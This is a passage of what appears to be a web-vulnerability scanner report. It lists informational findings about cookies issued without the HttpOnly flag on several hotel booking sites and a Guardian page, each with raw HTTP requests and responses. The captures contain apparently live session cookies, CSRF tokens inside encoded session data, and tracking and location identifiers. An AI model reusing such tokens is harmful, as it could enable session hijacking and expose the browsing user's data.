User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=CCF4A420AF8B480F8413EFB42E880287; U9Z5=0; s_vi=[CS]v1|27447EB905149286-6000018C4001272D[CE]; bn_u=7520316067152911274; COOKIECHECK=1; iEAPID=0000,; lsrc=v.1,10/16/2011; JSESSION=1cf0d0d6-5e6f-4aff-9a37-f908a92430be; s1=`0; p1=`tpid=v.1,1`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`63; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; aspp=v.1,0|US.BD.ORBITZ.HOTEL.HOTEL|||||||||OLA|20111101|; MediaCookie=0`1034,1004,PDEST,BOS; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Location: /Hotel.h894999.Hotel-Information?hashTag=roomsAndRates&&chkin=10/14/11&chkout=10/16/11&rm1=a2&icmcid=TRIPA.Expedia_US-H_B4.11893.T&icmdtl=MT1110027Z3xeMPeET6itK0Qu1f-JQAAU.894999.HDSSDeE.T.QCI.258705.ch.668.60745.en_US..&eapid=21187-1
Content-Length: 383
Content-Type: text/html
Cache-Control: private
Date: Mon, 03 Oct 2011 01:02:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: p1=`tpid=v.1,1`11; expires=Sun, 2-Oct-2016 00:00:01 GMT; domain=.expedia.com; path=/
Set-Cookie: iEAPID=21187; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/
Set-Cookie: s1=`EAPName=TripAdvisor`EAPBrandingFeature=0`EAPIsVisible=0`EAPIndustry=Other`MH=21187`EAPBrandingURL=`99; domain=.expedia.com; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Hotel.h894999.Hotel-Information?hashTag=roomsAndRates&amp;&amp;chkin=10/14/11&amp;chkout=10/16/11
...[SNIP]...
14.235. http://www.getaroom.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; show_pu=pageview=0&allowed=true&shown=false; www_session=BAh7CToLc2VhcmNoaQM79eU6D3Nlc3Npb25faWQiJTRmMGJjNjU4OGRkNTY4ZGQwMjcyYjU3Njg0OGRlNmYxIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewY6C25vdGljZSImUGxlYXNlIGVudGVyIGEgdmFsaWQgZGVzdGluYXRpb24uBjoKQHVzZWR7BjsIRjoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--bc19aecb2a0c7d888b60a967615bd73985c6d315

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "f57a77ed77550a00b9eb6450a79c54dc"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 299
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 88588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...
14.236. http://www.getaroom.com/browse/market_deals  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /browse/market_deals

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /browse/market_deals?market_id=10 HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7; show_pu=pageview=1&allowed=true&shown=false; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.2.9.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "c52e212f54eec4829ea5658dd625fe7e"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 489
Set-Cookie: show_pu=pageview=1&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--4a29eac522682a877f487f79d32005f0cda149f5; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 8536

this.heading_update[this.deals_cache_index] = '<div id=\"deals_heading\"><h2>Hotel Deals of the Day &#183; <span id=\"updated_deals_heading\">Washington DC<\/span><\/h2><\/div>';

this.deals_cache[thi
...[SNIP]...
14.237. http://www.getaroom.com/searches/show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /searches/show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searches/show?destination=+&check_in=10/09/2011&check_out=10/16/2011&num_guests=1&num_rooms=1&affiliate=032ea00e HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 302
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
Location: http://www.getaroom.com/searches/show?check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&destination=+&num_guests=1&num_rooms=1&utm_campaign=Affiliate&utm_medium=cpa&utm_source=away.com
X-Runtime: 7
Content-Length: 277
Set-Cookie: affiliate=032ea00e; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoQX2NzcmZfdG9rZW4iMVR4WEUwczk1eTNLa0dhMUZCZ2FIYnFzNEpPTmppTnlIUVA4ckNaYnpJVkE9Og9zZXNzaW9uX2lkIiU0ZjBiYzY1ODhkZDU2OGRkMDI3MmI1NzY4NDhkZTZmMSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--497837da868085a13e75b3c8521055c245269263; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: no-cache
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)

<html><body>You are being <a href="http://www.getaroom.com/searches/show?check_in=10%2F09%2F2011&amp;check_out=10%2F16%2F2011&amp;destination=+&amp;num_guests=1&amp;num_rooms=1&amp;utm_campaign=Affili
...[SNIP]...
14.238. http://www.getaroom.com/searches/show  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /searches/show

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /searches/show?check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&destination=+&num_guests=1&num_rooms=1&utm_campaign=Affiliate&utm_medium=cpa&utm_source=away.com HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; www_session=BAh7BjoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE%3D--439cabc6f716d9f1cd805153e9ac86b053180a4c

Response

HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 302
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
Location: http://www.getaroom.com/
X-Runtime: 22
Content-Length: 90
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DUY6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--ca4f0b0b5d11bae9b110fc0efc9cbe24aba9e868; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: no-cache
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)

<html><body>You are being <a href="http://www.getaroom.com/">redirected</a>.</body></html>
14.239. http://www.getaroom.com/washington-dc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.getaroom.com
Path:   /washington-dc

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /washington-dc?amenities%5B%5D=&check_in=10%2F09%2F2011&check_out=10%2F16%2F2011&commit=Go&lucky=true&page=1&property_name=&rinfo=%5B%5B18%5D%5D&search%5Bdestination%5D=m10&sort_order=position HTTP/1.1
Host: www.getaroom.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.getaroom.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: affiliate=032ea00e; __utma=155214180.1038388400.1317602249.1317602249.1317602249.1; __utmb=155214180.3.8.1317603739739; __utmc=155214180; __utmz=155214180.1317602249.1.1.utmcsr=trip.com|utmccn=(referral)|utmcmd=referral|utmcct=/hotels.html; show_pu=pageview=1&allowed=true&shown=false; www_session=BAh7CzoLc2VhcmNoaQM79eU6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNGYwYmM2NTg4ZGQ1NjhkZDAyNzJiNTc2ODQ4ZGU2ZjE6EF9jc3JmX3Rva2VuIjFUeFhFMHM5NXkzS2tHYTFGQmdhSGJxczRKT05qaU55SFFQOHJDWmJ6SVZBPSIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsGOgtub3RpY2UiJlBsZWFzZSBlbnRlciBhIHZhbGlkIGRlc3RpbmF0aW9uLgY6CkB1c2VkewY7DVQ6E3JlbW90ZV9hZGRyZXNzIhI1MC4yMy4xMjMuMTA2--b58708075c48fab0524aa6038b8528509d08eae7

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.8
ETag: "d2a96c7313287816400edfcdf271bec7"
P3P: CP="CAO DSP DEVa TAIa OUR BUS UNI NAV STA PRE LOC", policyref="/w3c/p3p.xml"
X-Runtime: 1110
Set-Cookie: show_pu=pageview=0&allowed=true&shown=false; path=/
Set-Cookie: www_session=BAh7CjoLc2VhcmNoaQPmLuY6EWdlb19sb2NhdGlvbnsIOhFjb3VudHJ5X2NvZGUiB1VTOhJjdXJyZW5jeV9jb2RlIghVU0Q6EWNvdW50cnlfbmFtZSISVW5pdGVkIFN0YXRlczoPc2Vzc2lvbl9pZCIlNzQ2ZWU2NzIwNWNhYjFlZjA2OTIzYWNlNWE2NGUxMTQ6EF9jc3JmX3Rva2VuIjFIc3ZVTXFGbm9OeXdJNndseElkTFBVeGNBUVRPb2NIaTlJZERGd1ZxVkhjPToTcmVtb3RlX2FkZHJlc3MiEjUwLjIzLjEyMy4xMDY%3D--5dfe791c81b6c944bb35ded07f19836e6a759bfc; domain=.getaroom.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.55 + Phusion Passenger 3.0.8 (mod_rails/mod_rack)
Content-Length: 170579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.c
...[SNIP]...
14.240. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guardian.co.uk
Path:   /football/2011/sep/27/manchester-united-basel-live

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /football/2011/sep/27/manchester-united-basel-live HTTP/1.1
Host: www.guardian.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; s_pers=%20s_lv%3D1317599402360%7C1412207402360%3B%20s_lv_s%3DFirst%2520Visit%7C1317601202360%3B%20s_visit%3D1%7C1317601202363%3B%20c_dl%3D1%7C1317601202366%3B%20s_ev36_persist%3DDirect%2520Load%7C1318204202383%3B%20s_37_persist%3DDirect%2520Load%7C1318204202395%3B%20s_ev40%3D%255B%255B'Direct%252520Load'%252C'1317599402404'%255D%255D%7C1475452202404%3B%20gpv_pageName%3DManchester%2520United%253AKeyword%2520Page%253A589863%7C1317601202406%3B%20s_nr%3D1317599402415-New%7C1349135402415%3B; s_vi=[CS]v1|27447C5685010C0B-4000010320138FC1[CE]; OAX=Mhd7ak6I+K0ABUJY; OAX_tmp=4d686437616b36492b4b304142554a59; _publishflow=4galn0lq98x95vrg; member_type=0; s_sess=%20s_cc%3Dtrue%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3D%3B%20s_ppv%3D27%3B; GU_ST=; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:57:55 GMT
Server: Apache
X-GU-jas: 54-23155
X-GU-PageRenderer: Hypercharger
Content-Type: text/html; charset=UTF-8
Set-Cookie: GU_LOCATION=dXNhOjU6dnQ6NTpzdG93ZTo1OjUyMzpicm9hZGJhbmQ6IDQ0LjUwMDotNzIuNjQ2QDg2MjQxMTYzMTY1MzMyMzU2NTEwMjIxMTk2MjQ0MjAyMTgxNzExNjk3; path=/; domain=.guardian.co.uk; expires=Sun, 23-Oct-2011 23:57:55 GMT
Vary: Accept-Encoding,User-Agent
X-GU-httpd: 52
P3P: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONa TELa OUR IND ONLi UNI PURi NAV STA PRE LOC"
Content-Length: 121369
Connection: close


<!DOCTYPE html><html lang="en">

<head>
                <script type="text/javascript" >
document.domain = "guardian.co.uk";

...[SNIP]...
14.241. http://www.hotelplanner.com/Search/Index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
14.242. https://www.hotelplanner.com/Accept/Reserve.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:30:37 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58824

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
14.243. http://www.hotels.com/PPCHotelDetails  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /PPCHotelDetails

Issue detail

